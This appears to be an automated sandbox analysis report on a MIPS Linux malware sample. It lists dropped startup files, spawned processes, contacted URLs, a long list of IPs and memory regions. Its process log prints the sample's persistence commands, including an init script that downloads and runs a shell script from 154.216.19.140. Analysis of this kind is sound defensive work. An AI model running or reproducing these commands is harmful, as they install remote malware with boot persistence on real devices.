Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
7aodVUk6TV.elf
|
ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
|
initial sample
|
 |
|
|
/etc/init.d/7aodVUk6TV.elf
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/init.d/mybinary
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/profile
|
ASCII text
|
dropped
|
|
|
|
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/boot/bootcmd
|
ASCII text
|
dropped
|
||
|
/etc/inittab
|
ASCII text
|
dropped
|
||
|
/etc/motd
|
ASCII text
|
dropped
|
||
|
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
|
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
||
|
/tmp/qemu-open.ieKc0N (deleted)
|
data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/tmp/7aodVUk6TV.elf
|
/tmp/7aodVUk6TV.elf
|
||
|
/tmp/7aodVUk6TV.elf
|
-
|
||
|
/tmp/7aodVUk6TV.elf
|
-
|
||
|
/bin/sh
|
sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
|
/tmp/7aodVUk6TV.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/mybinary
|
||
|
/tmp/7aodVUk6TV.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
|
||
|
/tmp/7aodVUk6TV.elf
|
-
|
||
|
/bin/sh
|
sh -c "echo \"#!/bin/sh\n# /etc/init.d/7aodVUk6TV.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting 7aodVUk6TV.elf'\n
/tmp/7aodVUk6TV.elf &\n wget http://154.216.19.140/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n
stop)\n echo 'Stopping 7aodVUk6TV.elf'\n killall 7aodVUk6TV.elf\n ;;\n restart)\n $0 stop\n $0 start\n
;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/7aodVUk6TV.elf"
|
||
|
/tmp/7aodVUk6TV.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/7aodVUk6TV.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/7aodVUk6TV.elf
|
||
|
/tmp/7aodVUk6TV.elf
|
-
|
||
|
/bin/sh
|
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
|
/tmp/7aodVUk6TV.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/7aodVUk6TV.elf /etc/rc.d/S997aodVUk6TV.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/7aodVUk6TV.elf /etc/rc.d/S997aodVUk6TV.elf
|
||
|
/tmp/7aodVUk6TV.elf
|
-
|
||
|
/tmp/7aodVUk6TV.elf
|
-
|
||
|
/tmp/7aodVUk6TV.elf
|
-
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
|
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
There are 38 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://154.216.19.140/curl.sh
|
unknown
|
||
|
http://154.216.19.140/lol.sh
|
unknown
|
||
|
http://154.216.19.140/
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
86.222.52.93
|
unknown
|
France
|
||
|
221.254.18.68
|
unknown
|
Japan
|
||
|
126.250.189.205
|
unknown
|
Japan
|
||
|
76.241.88.230
|
unknown
|
United States
|
||
|
131.4.166.50
|
unknown
|
United States
|
||
|
162.168.144.163
|
unknown
|
United States
|
||
|
223.227.192.217
|
unknown
|
India
|
||
|
41.236.193.57
|
unknown
|
Egypt
|
||
|
150.120.110.245
|
unknown
|
United States
|
||
|
210.121.10.165
|
unknown
|
Korea Republic of
|
||
|
85.64.220.198
|
unknown
|
Israel
|
||
|
164.84.250.249
|
unknown
|
United States
|
||
|
137.85.79.237
|
unknown
|
United States
|
||
|
162.198.92.176
|
unknown
|
United States
|
||
|
132.160.195.228
|
unknown
|
United States
|
||
|
149.67.101.96
|
unknown
|
United States
|
||
|
175.131.8.173
|
unknown
|
Japan
|
||
|
105.193.205.242
|
unknown
|
Egypt
|
||
|
77.121.20.83
|
unknown
|
Ukraine
|
||
|
4.64.158.36
|
unknown
|
United States
|
||
|
11.200.104.204
|
unknown
|
United States
|
||
|
148.159.36.148
|
unknown
|
United States
|
||
|
77.228.147.208
|
unknown
|
Spain
|
||
|
153.26.128.196
|
unknown
|
United States
|
||
|
129.200.113.88
|
unknown
|
United States
|
||
|
14.90.127.30
|
unknown
|
Korea Republic of
|
||
|
114.174.119.53
|
unknown
|
Japan
|
||
|
83.211.55.159
|
unknown
|
Italy
|
||
|
124.186.243.84
|
unknown
|
Australia
|
||
|
186.86.212.65
|
unknown
|
Colombia
|
||
|
67.98.211.210
|
unknown
|
United States
|
||
|
26.136.114.29
|
unknown
|
United States
|
||
|
205.176.37.211
|
unknown
|
United States
|
||
|
70.36.152.195
|
unknown
|
United States
|
||
|
3.90.7.6
|
unknown
|
United States
|
||
|
168.239.149.83
|
unknown
|
United States
|
||
|
82.213.142.78
|
unknown
|
Spain
|
||
|
2.108.252.90
|
unknown
|
Denmark
|
||
|
194.219.199.17
|
unknown
|
Greece
|
||
|
204.229.63.228
|
unknown
|
United States
|
||
|
179.4.147.147
|
unknown
|
Chile
|
||
|
72.143.70.138
|
unknown
|
Canada
|
||
|
165.110.43.144
|
unknown
|
United States
|
||
|
79.126.150.219
|
unknown
|
Macedonia
|
||
|
191.143.58.255
|
unknown
|
Brazil
|
||
|
32.37.213.51
|
unknown
|
United States
|
||
|
189.175.166.125
|
unknown
|
Mexico
|
||
|
26.51.26.3
|
unknown
|
United States
|
||
|
82.31.249.118
|
unknown
|
United Kingdom
|
||
|
101.91.248.63
|
unknown
|
China
|
||
|
194.195.240.10
|
unknown
|
Germany
|
||
|
103.40.168.246
|
unknown
|
India
|
||
|
12.174.219.76
|
unknown
|
United States
|
||
|
28.180.35.160
|
unknown
|
United States
|
||
|
210.179.130.217
|
unknown
|
Korea Republic of
|
||
|
102.210.129.125
|
unknown
|
unknown
|
||
|
213.37.51.204
|
unknown
|
Spain
|
||
|
90.122.232.127
|
unknown
|
France
|
||
|
197.147.102.175
|
unknown
|
Morocco
|
||
|
64.35.68.168
|
unknown
|
United States
|
||
|
62.57.103.57
|
unknown
|
Spain
|
||
|
58.7.163.160
|
unknown
|
Australia
|
||
|
187.151.177.16
|
unknown
|
Mexico
|
||
|
164.189.64.31
|
unknown
|
United States
|
||
|
69.82.128.184
|
unknown
|
United States
|
||
|
131.214.112.175
|
unknown
|
United States
|
||
|
45.188.51.46
|
unknown
|
unknown
|
||
|
199.58.42.176
|
unknown
|
United States
|
||
|
185.168.37.74
|
unknown
|
Greece
|
||
|
134.213.128.132
|
unknown
|
Ireland
|
||
|
215.146.95.191
|
unknown
|
United States
|
||
|
214.43.194.99
|
unknown
|
United States
|
||
|
2.118.60.70
|
unknown
|
Italy
|
||
|
155.11.170.160
|
unknown
|
Egypt
|
||
|
2.194.68.32
|
unknown
|
Italy
|
||
|
207.136.187.137
|
unknown
|
United States
|
||
|
142.33.118.55
|
unknown
|
Canada
|
||
|
190.23.253.224
|
unknown
|
Paraguay
|
||
|
70.239.231.160
|
unknown
|
United States
|
||
|
88.107.146.54
|
unknown
|
United Kingdom
|
||
|
142.201.29.245
|
unknown
|
Canada
|
||
|
55.71.156.171
|
unknown
|
United States
|
||
|
36.56.105.193
|
unknown
|
China
|
||
|
118.207.25.35
|
unknown
|
China
|
||
|
139.137.180.214
|
unknown
|
United States
|
||
|
130.43.34.92
|
unknown
|
Greece
|
||
|
222.46.67.94
|
unknown
|
China
|
||
|
193.143.1.59
|
unknown
|
unknown
|
||
|
187.70.115.128
|
unknown
|
Brazil
|
||
|
60.20.148.106
|
unknown
|
China
|
||
|
158.21.148.9
|
unknown
|
United States
|
||
|
181.17.165.90
|
unknown
|
Venezuela
|
||
|
6.94.145.138
|
unknown
|
United States
|
||
|
148.75.95.220
|
unknown
|
United States
|
||
|
102.2.234.15
|
unknown
|
unknown
|
||
|
108.161.215.193
|
unknown
|
United States
|
||
|
74.172.83.78
|
unknown
|
United States
|
||
|
68.186.78.120
|
unknown
|
United States
|
||
|
72.33.229.162
|
unknown
|
United States
|
||
|
130.65.241.194
|
unknown
|
United States
|
There are 90 hidden IPs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7f1ecc421000
|
page execute read
|
|
||
|
7f1ecc421000
|
page execute read
|
|
||
|
7f1f51cb6000
|
page read and write
|
|||
|
7f1f519f8000
|
page read and write
|
|||
|
556c8ad3c000
|
page execute and read and write
|
|||
|
7f1f5271f000
|
page read and write
|
|||
|
7f1f52097000
|
page read and write
|
|||
|
7f1f51a06000
|
page read and write
|
|||
|
556c8bb61000
|
page read and write
|
|||
|
7f1f523c8000
|
page read and write
|
|||
|
556c88aac000
|
page execute read
|
|||
|
7f1ecc466000
|
page read and write
|
|||
|
7f1f526da000
|
page read and write
|
|||
|
7f1f52097000
|
page read and write
|
|||
|
7f1f4c021000
|
page read and write
|
|||
|
7ffcdd07e000
|
page read and write
|
|||
|
7f1ecc46b000
|
page read and write
|
|||
|
556c8ad53000
|
page read and write
|
|||
|
556c88aac000
|
page execute read
|
|||
|
7f1f4c021000
|
page read and write
|
|||
|
7f1f511f0000
|
page read and write
|
|||
|
556c8bb61000
|
page read and write
|
|||
|
556c8ad3c000
|
page execute and read and write
|
|||
|
7f1f4c000000
|
page read and write
|
|||
|
7f1f525a9000
|
page read and write
|
|||
|
7f1f52057000
|
page read and write
|
|||
|
7f1f51a06000
|
page read and write
|
|||
|
556c88d34000
|
page read and write
|
|||
|
7f1f526d2000
|
page read and write
|
|||
|
7f1ecc462000
|
page read and write
|
|||
|
7f1f52057000
|
page read and write
|
|||
|
556c8ad53000
|
page read and write
|
|||
|
7f1f5207a000
|
page read and write
|
|||
|
7ffcdd0c2000
|
page execute read
|
|||
|
7f1f523c8000
|
page read and write
|
|||
|
7f1f525a9000
|
page read and write
|
|||
|
7ffcdd07e000
|
page read and write
|
|||
|
556c88d3e000
|
page read and write
|
|||
|
556c88d34000
|
page read and write
|
|||
|
7f1f519f8000
|
page read and write
|
|||
|
7f1f526da000
|
page read and write
|
|||
|
7f1f5271f000
|
page read and write
|
|||
|
7f1f51cb6000
|
page read and write
|
|||
|
7f1f4c000000
|
page read and write
|
|||
|
7f1ecc462000
|
page read and write
|
|||
|
7f1f526d2000
|
page read and write
|
|||
|
7f1f511f0000
|
page read and write
|
|||
|
7f1f5207a000
|
page read and write
|
|||
|
556c88d3e000
|
page read and write
|
|||
|
7ffcdd0c2000
|
page execute read
|
|||
|
7f1ecc466000
|
page read and write
|
There are 41 hidden memdumps, click here to show them.